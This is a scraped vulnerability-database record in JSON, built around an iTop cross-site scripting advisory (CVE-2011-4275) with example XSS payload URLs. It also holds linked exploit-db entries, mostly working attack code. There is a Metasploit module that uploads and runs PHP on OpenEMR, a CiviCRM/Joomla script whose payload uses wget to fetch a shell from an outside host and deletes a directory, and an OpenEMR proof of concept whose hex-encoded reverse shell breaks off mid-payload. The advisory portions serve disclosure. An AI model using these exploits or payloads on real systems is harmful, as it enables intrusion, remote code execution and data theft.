ID SECURITYVULNS:VULN:12054
Type securityvulns
Reporter
Modified 2011-11-27T00:00:00
Description
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
{"id": "SECURITYVULNS:VULN:12054", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2011-11-27T00:00:00", "modified": "2011-11-27T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12054", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27350", "https://vulners.com/securityvulns/securityvulns:doc:27355", "https://vulners.com/securityvulns/securityvulns:doc:27358", "https://vulners.com/securityvulns/securityvulns:doc:27349", "https://vulners.com/securityvulns/securityvulns:doc:27353", "https://vulners.com/securityvulns/securityvulns:doc:27359", "https://vulners.com/securityvulns/securityvulns:doc:27364", "https://vulners.com/securityvulns/securityvulns:doc:27356", "https://vulners.com/securityvulns/securityvulns:doc:27362", "https://vulners.com/securityvulns/securityvulns:doc:27363", "https://vulners.com/securityvulns/securityvulns:doc:27365", "https://vulners.com/securityvulns/securityvulns:doc:27351", "https://vulners.com/securityvulns/securityvulns:doc:27357", "https://vulners.com/securityvulns/securityvulns:doc:27354", "https://vulners.com/securityvulns/securityvulns:doc:27368", "https://vulners.com/securityvulns/securityvulns:doc:27370", "https://vulners.com/securityvulns/securityvulns:doc:27361", "https://vulners.com/securityvulns/securityvulns:doc:27367", "https://vulners.com/securityvulns/securityvulns:doc:27352", "https://vulners.com/securityvulns/securityvulns:doc:27366", "https://vulners.com/securityvulns/securityvulns:doc:27369"], "cvelist": ["CVE-2011-4275"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:45", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": 
"83641d0c7b4db09e4371bbbd3c217837"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "2fd0ec8aeab2fbc260f0a9e7ea7dc81d"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "eb723f2c2b2fdd80b49d7bde7f6706c0"}, {"key": "modified", "hash": "a5013292d59a3f9e71467dc3fbf2218b"}, {"key": "published", "hash": "a5013292d59a3f9e71467dc3fbf2218b"}, {"key": "references", "hash": "58d9265b6da239d05f35b10643d2ca56"}, {"key": "reporter", "hash": "7215ee9c7d9dc229d2921a40e899ec5f"}, {"key": "title", "hash": "9caff91e9ebcf551c6d0d9d96b286138"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "483e4764bf9b10d2532d2ea67a8923751df493c5ae1416b41902bda524baded9", "viewCount": 5, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-08-31T11:09:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4275"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27354"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:107245"]}, {"type": "exploitdb", "idList": ["EDB-ID:24529", "EDB-ID:24492", "EDB-ID:24969", "EDB-ID:29210", "EDB-ID:29091", "EDB-ID:10532"]}], "modified": "2018-08-31T11:09:45"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "affectedSoftware": [{"name": "TinyMCE", "operator": "eq", "version": "3.4"}, {"name": "meenews", "operator": "eq", "version": "5.1"}, {"name": "spip", "operator": "eq", "version": "2.1"}, {"name": "PmWiki", "operator": "eq", "version": "2.2"}, {"name": "Blogs manager", "operator": "eq", "version": "1.101"}, {"name": "WordPress", "operator": "eq", "version": "3.1"}, {"name": "CMS Balitbang", "operator": "eq", "version": "3.0"}, {"name": "RoundCube", "operator": "eq", "version": "0.6"}, {"name": "flvPlayer", "operator": "eq", "version": "1.0"}, {"name": "Freelancer calendar", "operator": "eq", "version": "1.01"}, {"name": "Support Incident 
Tracker", "operator": "eq", "version": "3.65"}, {"name": "Valid tiny-erp", "operator": "eq", "version": "1.6"}, {"name": "iTop", "operator": "eq", "version": "1.1"}, {"name": "Dolibarr", "operator": "eq", "version": "3.1"}, {"name": "WordPress", "operator": "eq", "version": "2.6"}]}
{"cve": [{"lastseen": "2018-10-10T11:34:14", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.", "modified": "2018-10-09T15:33:28", "published": "2011-11-25T22:57:45", "id": "CVE-2011-4275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4275", "title": "CVE-2011-4275", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181\r\n\r\nPublished: 2011/11/16\r\nVersion 1.0\r\n\r\nAffected products:\r\n iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)\r\n http://sourceforge.net/projects/itop/\r\n\r\nReferences: \r\n CVE-2011-4275 - Multiple web-vulnerabilities in iTop\r\n TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt\r\n(used for updates)\r\n \r\nSummary:\r\n "IT Operations Portal: a complete open source, ITIL, web based \r\n service management tool including a fully customizable CMDB, \r\n a helpdesk system and a document management tool."\r\n Several common flaws could be found in iTop like reflected\r\n and stored XSS.\r\n\r\n\r\nVulnerable Scripts:\r\n stored XSS:\r\n - almost every tested input field stored in database and in the\r\nhtml-content of the site. 
\r\n Especially in case data is reformatted using Javascript, the\r\nsanitisation in place \r\n seems to be overridden.\r\n\r\n reflected XSS:\r\n - almost every test input field where the value is reflected in\r\nservers output\r\n\r\nExamples:\r\n stored XSS:\r\n - add a company named "XSS <script>alert("Help Me")</script>"\r\n - add a database server named "XSS <script>alert("Help\r\nMe")</script>"\r\n - import a CSV-File where one cell contains "XSS <script>alert("Help\r\nMe")</script>"\r\n - copy&paste data (which does the same as CSV-import) using\r\n 1;Test 1\r\n 2;Test 2\r\n 3;Test 3<script>alert("23746234243 Test")</script>"\r\n\r\n reflected XSS (un-authenticated):\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help\r\nMe")</script><lala="&suggest_pwd=admin\r\n\r\n reflected XSS (authenticated):\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help\r\nMe")</script><lala="&suggest_pwd=admin\r\n \r\nhttp://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help\r\nMe")</script>"\r\n \r\nhttp://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=Searc\r\nhFormToAdd_document_list \\r\n &description="<script>alert("Help\r\nMe")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \\r\n _form&org_id=3&status=draft&type=contract\r\n \r\nhttp://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C\r\n/script%3E%22&operation=errors&rule=1\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894\r\n9560%29%20bad%3d%22&suggest_pwd=test\r\n \r\nhttp://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse\r\nover%3dprompt%28972137%29%20bad%3d%22\r\n\r\nPossible solutions:\r\n - use version 1.2 final\r\n\r\nDisclosure Timeline:\r\n 2011/08/09 vendor contacted via contact@combodo.com\r\n 2011/08/09 inital vendor response\r\n 2011/09/06 first patch by the vendor\r\n 2011/09/12 second patch by the vendor\r\n 2011/11/16 public 
disclosure\r\n\r\nCredits:\r\n Tobias Glemser (tglemser@tele-consulting.com)\r\n Tele-Consulting security networking training GmbH, Germany\r\n www.tele-consulting.com\r\n \r\nDisclaimer:\r\n All information is provided without warranty. The intent is to \r\n provide information to secure infrastructure and/or systems, not\r\n to be able to attack or damage. Therefore Tele-Consulting shall \r\n not be liable for any direct or indirect damages that might be \r\n caused by using this information.\r\n", "modified": "2011-11-27T00:00:00", "published": "2011-11-27T00:00:00", "id": "SECURITYVULNS:DOC:27354", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27354", "title": "TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:30", "bulletinFamily": "exploit", "description": "", "modified": "2011-11-23T00:00:00", "published": "2011-11-23T00:00:00", "href": "https://packetstormsecurity.com/files/107245/iTop-1.1.181-Cross-Site-Scripting.html", "id": "PACKETSTORM:107245", "type": "packetstorm", "title": "iTop 1.1.181 Cross Site Scripting", "sourceData": "`TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 \n \nPublished: 2011/11/16 \nVersion 1.0 \n \nAffected products: \niTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well) \nhttp://sourceforge.net/projects/itop/ \n \nReferences: \nCVE-2011-4275 - Multiple web-vulnerabilities in iTop \nTC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt \n(used for updates) \n \nSummary: \n\"IT Operations Portal: a complete open source, ITIL, web based \nservice management tool including a fully customizable CMDB, \na helpdesk system and a document management tool.\" \nSeveral common flaws could be found in iTop like reflected \nand stored XSS. 
\n \n \nVulnerable Scripts: \nstored XSS: \n- almost every tested input field stored in database and in the \nhtml-content of the site. \nEspecially in case data is reformatted using Javascript, the \nsanitisation in place \nseems to be overridden. \n \nreflected XSS: \n- almost every test input field where the value is reflected in \nservers output \n \nExamples: \nstored XSS: \n- add a company named \"XSS <script>alert(\"Help Me\")</script>\" \n- add a database server named \"XSS <script>alert(\"Help \nMe\")</script>\" \n- import a CSV-File where one cell contains \"XSS <script>alert(\"Help \nMe\")</script>\" \n- copy&paste data (which does the same as CSV-import) using \n1;Test 1 \n2;Test 2 \n3;Test 3<script>alert(\"23746234243 Test\")</script>\" \n \nreflected XSS (un-authenticated): \n \nhttp://$domain/iTop/pages/UI.php?auth_user=admin\"><script>alert(\"Help \nMe\")</script><lala=\"&suggest_pwd=admin \n \nreflected XSS (authenticated): \n \nhttp://$domain/iTop/pages/UI.php?auth_user=admin\"><script>alert(\"Help \nMe\")</script><lala=\"&suggest_pwd=admin \n \nhttp://$domain/iTop/pages/UniversalSearch.php?c[menu]=\"<script>alert(\"Help \nMe\")</script>\" \n \nhttp://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note¤tId=Searc \nhFormToAdd_document_list \\ \n&description=\"<script>alert(\"Help \nMe\")</script>\"&dosearch=1&name=Acunetix&open=1&operation=search \\ \n_form&org_id=3&status=draft&type=contract \n \nhttp://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C \n/script%3E%22&operation=errors&rule=1 \n \nhttp://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894 \n9560%29%20bad%3d%22&suggest_pwd=test \n \nhttp://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse \nover%3dprompt%28972137%29%20bad%3d%22 \n \nPossible solutions: \n- use version 1.2 final \n \nDisclosure Timeline: \n2011/08/09 vendor contacted via contact@combodo.com \n2011/08/09 inital vendor response \n2011/09/06 first patch by the vendor 
\n2011/09/12 second patch by the vendor \n2011/11/16 public disclosure \n \nCredits: \nTobias Glemser (tglemser@tele-consulting.com) \nTele-Consulting security networking training GmbH, Germany \nwww.tele-consulting.com \n \nDisclaimer: \nAll information is provided without warranty. The intent is to \nprovide information to secure infrastructure and/or systems, not \nto be able to attack or damage. Therefore Tele-Consulting shall \nnot be liable for any direct or indirect damages that might be \ncaused by using this information. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/107245/TC-SA-2011-02.txt"}], "exploitdb": [{"lastseen": "2016-02-02T23:28:51", "bulletinFamily": "exploit", "description": "OpenEMR PHP File Upload Vulnerability. CVE-2009-4140,CVE-2011-4275. Remote exploit for php platform", "modified": "2013-02-20T00:00:00", "published": "2013-02-20T00:00:00", "id": "EDB-ID:24529", "href": "https://www.exploit-db.com/exploits/24529/", "type": "exploitdb", "title": "OpenEMR PHP File Upload Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::FileDropper\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"OpenEMR PHP File Upload Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the\r\n\t\t\t\tofc_upload_image.php file from the openflashchart library, a malicious user can\r\n\t\t\t\tupload a file to the tmp-upload-images directory without any authentication, which\r\n\t\t\t\tresults in arbitrary code execution. The module has been tested successfully on\r\n\t\t\t\tOpenEMR 4.1.1 over Ubuntu 10.04.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '90222' ],\r\n\t\t\t\t\t[ 'BID', '37314' ],\r\n\t\t\t\t\t[ 'EBD', '24492' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['php'],\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OpenEMR 4.1.1', {}]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Feb 13 2013\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\r\n\t\t# Check 
version\r\n\t\tprint_status(\"#{peer} - Trying to detect installed version\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => normalize_uri(uri, \"interface\", \"login\", \"login.php\")\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /v(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tprint_status(\"#{peer} - Version #{version} detected\")\r\n\r\n\t\tif version > \"4.1.1\"\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\t# Check for vulnerable component\r\n\t\tprint_status(\"#{peer} - Trying to detect the vulnerable component\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => normalize_uri(\"#{uri}\", \"library\", \"openflashchart\", \"php-ofc-library\", \"ofc_upload_image.php\"),\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /Saving your image to/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = target_uri.path\r\n\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\t\tpayload_name = rand_text_alpha(rand(10) + 5) + '.php'\r\n\t\tmy_payload = payload.encoded\r\n\r\n\t\tprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\")\r\n\t\tres = send_request_raw({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => normalize_uri(\"#{uri}\", \"library\", \"openflashchart\", \"php-ofc-library\", \"ofc_upload_image.php\") + \"?name=#{payload_name}\",\r\n\t\t\t'headers' => { \"Content-Length\" => my_payload.length.to_s },\r\n\t\t\t'data' => my_payload\r\n\t\t})\r\n\r\n\t\t# If the server returns 200 and the body contains our payload name,\r\n\t\t# we assume we uploaded the malicious file successfully\r\n\t\tif not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/\r\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{peer} - File wasn't uploaded, 
aborting!\")\r\n\t\tend\r\n\r\n\t\tregister_file_for_cleanup(payload_name)\r\n\r\n\t\tprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\")\r\n\t\t# Execute our payload\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => normalize_uri(\"#{uri}\", \"library\", \"openflashchart\", \"tmp-upload-images\", payload_name),\r\n\t\t})\r\n\r\n\t\t# If we don't get a 200 when we request our malicious payload, we suspect\r\n\t\t# we don't have a shell, either. Print the status code for debugging purposes.\r\n\t\tif res and res.code != 200\r\n\t\t\tprint_error(\"#{peer} - Server returned #{res.code.to_s}\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24529/"}, {"lastseen": "2016-02-03T00:22:05", "bulletinFamily": "exploit", "description": "CiviCRM for Joomla 4.2.2 - Remote Code Injection. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "modified": "2013-04-22T00:00:00", "published": "2013-04-22T00:00:00", "id": "EDB-ID:24969", "href": "https://www.exploit-db.com/exploits/24969/", "type": "exploitdb", "title": "CiviCRM for Joomla 4.2.2 - Remote Code Injection", "sourceData": "# Exploit Title: joomla component com_civicrm remode code injection exploit\r\n# Google Dork:\"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart\"\r\n# Date: 20/04/2013\r\n# Exploit Author: iskorpitx\r\n# Vendor Homepage: http://civicrm.org\r\n# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422\r\n# Version: [civicrm 4.2.2]\r\n# Tested on: Win8 Pro x64 \r\n# CVE : http://www.securityweb.org\r\n\r\n<?php \r\n \r\n# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit\r\n# http://www.securityweb.org & http://www.security.biz.tr\r\n# multithreading mass c:\\appserv\\www>exp.php -u http://target.com/ -f post.php\r\n \r\n 
\r\n \r\n$options = getopt('u:f:'); \r\n \r\nif(!isset($options['u'], $options['f'])) \r\ndie(\"\\n Usage example: php jnews.php -u http://target.com/ -f post.php\\n \r\n-u http://target.com/ The full path to Joomla! \r\n-f post.php The name of the file to create.\\n\"); \r\n \r\n$url = $options['u']; \r\n$file = $options['f']; \r\n\r\n\r\n$shell = \"{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}\"; \r\n$url = \"{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}\"; \r\n\r\n \r\n$data = '<?php \r\n system(\"wget http://www.securityweb.org/shell.txt; mv shell.txt post.php\");\r\n system(\"cp post.php ../../../../../../../tmp/post.php\");\r\n system(\"cd ..; rm -rf tmp-upload-images\");\r\n echo \"by iskorpitx\" ; \r\n fclose ( $handle ); \r\n ?>'; \r\n$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', \r\n'Content-Type: text/plain'); \r\n \r\n \r\necho \" [+] Submitting request to: {$options['u']}\\n\"; \r\n \r\n \r\n$handle = curl_init(); \r\n \r\ncurl_setopt($handle, CURLOPT_URL, $url); \r\ncurl_setopt($handle, CURLOPT_HTTPHEADER, $headers); \r\ncurl_setopt($handle, CURLOPT_POSTFIELDS, $data); \r\ncurl_setopt($handle, CURLOPT_RETURNTRANSFER, true); \r\n \r\n$source = curl_exec($handle); \r\ncurl_close($handle); \r\n \r\n \r\nif(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) \r\n{ \r\necho \" [+] Exploit completed successfully!\\n\"; \r\necho \" ______________________________________________\\n\\n {$shell}?cmd=system('id');\\n\"; \r\n} \r\nelse\r\n{ \r\ndie(\" [+] Exploit was unsuccessful.\\n\"); \r\n} \r\n \r\n?> \r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24969/"}, {"lastseen": "2016-02-02T23:24:34", "bulletinFamily": "exploit", 
"description": "OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "modified": "2013-02-13T00:00:00", "published": "2013-02-13T00:00:00", "id": "EDB-ID:24492", "href": "https://www.exploit-db.com/exploits/24492/", "type": "exploitdb", "title": "OpenEMR 4.1.1 ofc_upload_image.php Arbitrary File Upload Vulnerability", "sourceData": "<?php\r\n\r\n/*\r\n\r\nOpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability\r\n\r\n\r\nVendor: OpenEMR\r\nProduct web page: http://www.open-emr.org\r\nAffected version: 4.1.1\r\n\r\nSummary: OpenEMR is a Free and Open Source electronic health records and medical\r\npractice management application that can run on Windows, Linux, Mac OS X, and many\r\nother platforms.\r\n\r\nDesc: The vulnerability is caused due to the improper verification of uploaded\r\nfiles in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script\r\nthru the 'name' parameter. This can be exploited to execute arbitrary PHP code\r\nby uploading a malicious PHP script with multiple extensions.\r\n\r\n================================================================================\r\n/library/openflashchart/php-ofc-library/ofc_upload_image.php:\r\n-------------------------------------------------------------\r\n\r\n21: $default_path = '../tmp-upload-images/';\r\n23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);\r\n26: $destination = $default_path . basename( $_GET[ 'name' ] );\r\n28: echo 'Saving your image to: '. 
$destination;\r\n39: $jfh = fopen($destination, 'w') or die(\"can't open file\");\r\n40: fwrite($jfh, $HTTP_RAW_POST_DATA);\r\n41: fclose($jfh);\r\n46: exit();\r\n\r\n================================================================================\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Fedora Linux\r\n Apache2, PHP 5.4 MySQL 5.5\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2013-5126\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php\r\n\r\n\r\n09.02.2013\r\n\r\n*/\r\n\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\n$go = \"\\033[0;92m\"; $no = \"\\033[0;37m\";\r\necho $no;\r\n\r\n$host = $argv[1];\r\n\r\n$sock = fsockopen($host, 80, $errno, $errstr, 30);\r\n\r\nif(!$sock)\r\n{\r\n echo \"\\n> $errstr ($errno)\\n\";\r\n die();\r\n}\r\n\r\nfunction r_shell($sc)\r\n{\r\n for($z = 0; $z < strlen($sc); $z += 2)\r\n $exec .= chr(hexdec(substr($sc,$z,2)));\r\n return $exec;\r\n}\r\n\r\nprint \"\\n+--------------------------------------------------------+\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth) +\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+ ID: ZSL-2013-5126 +\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+ Copyleft (c) 2013, Zero Science Lab +\";\r\nprint \"\\n+ +\";\r\nprint \"\\n+--------------------------------------------------------+\\n\\n\";\r\n\r\n// PoC for Linux\r\n// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234\r\n\r\nif ($argc < 2)\r\n{\r\n print \"\\n> Usage: php $argv[0] <target>\\n\\n\";\r\n die();\r\n}\r\n\r\n\r\n$pl = r_shell(\"3c3f7068700d0a\". \"7365745f74696d\". \"655f6c696d6974\".\r\n \"202830293b0d0a\". \"246970203d2027\". \"3132372e302e30\".\r\n \"2e31273b0d0a24\". \"706f7274203d20\". \"313233343b0d0a\".\r\n \"246368756e6b5f\". \"73697a65203d20\". \"313430303b0d0a\".\r\n \"2477726974655f\". \"61203d206e756c\". \"6c3b2024657272\".\r\n \"6f725f61203d20\". 
\"6e756c6c3b0d0a\". \"247368656c6c20\".\r\n \"3d2027756e616d\". \"65202d613b2077\". \"3b2069643b202f\".\r\n \"62696e2f736820\". \"2d69273b0d0a24\".\r\n \"6461656d6f6e20\". \"3d20303b202464\".\r\n \"65627567203d20\". \"303b0d0a696620\".\r\n \"2866756e637469\". \"6f6e5f65786973\".\r\n \"7473282770636e\". \"746c5f666f726b\".\r\n \"272929207b0d0a\". \"24706964203d20\".\r\n \"70636e746c5f66\". \"6f726b28293b0d\".\r\n \"0a696620282470\". \"6964203d3d202d\". \"3129207b0d0a70\".\r\n \"72696e74697428\". \"224552524f523a\". \"2043616e277420\".\r\n \"666f726b22293b\". \"20657869742831\". \"293b7d0d0a6966\".\r\n \"20282470696429\". \"207b6578697428\". \"30293b7d0d0a69\".\r\n \"662028706f7369\". \"785f7365747369\". \"642829203d3d20\".\r\n \"2d3129207b0d0a\". \"7072696e746974\". \"28224572726f72\".\r\n \"3a2043616e2774\". \"20736574736964\". \"282922293b2065\".\r\n \"7869742831293b\". \"7d0d0a24646165\".\r\n \"6d6f6e203d2031\". \"3b7d20656c7365\".\r\n \"207b0d0a707269\". \"6e746974282257\".\r\n \"41524e494e473a\". \"204661696c6564\".\r\n \"20746f20646165\". \"6d6f6e6973652e\".\r\n \"20205468697320\". \"69732071756974\".\r\n \"6520636f6d6d6f\". \"6e20616e64206e\".\r\n \"6f742066617461\". \"6c2e22293b7d0d\". \"0a636864697228\".\r\n \"222f22293b2075\". \"6d61736b283029\". \"3b0d0a24736f63\".\r\n \"6b203d2066736f\". \"636b6f70656e28\". \"2469702c202470\".\r\n \"6f72742c202465\". \"72726e6f2c2024\". \"6572727374722c\".\r\n \"203330293b0d0a\". \"69662028212473\". \"6f636b29207b0d\".\r\n \"0a7072696e7469\". \"74282224657272\". \"73747220282465\".\r\n \"72726e6f292229\". \"3b206578697428\". 
\"31293b7d0d0a24\".\r\n\r\n \"64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270\".\r\n \"697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d\".\r\n \"0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d\".\r\n \"2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470\".\r\n \"69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d\".\r\n \"0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d\".\r\n \"0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573\".\r\n \"5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31\".\r\n \"5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c\".\r\n \"2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a\".\r\n \"7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073\".\r\n \"68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620\".\r\n \"2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c\".\r\n \"20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620\".\r\n \"2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053\".\r\n \"68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472\".\r\n \"6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573\".\r\n \"5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73\".\r\n \"656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c\".\r\n 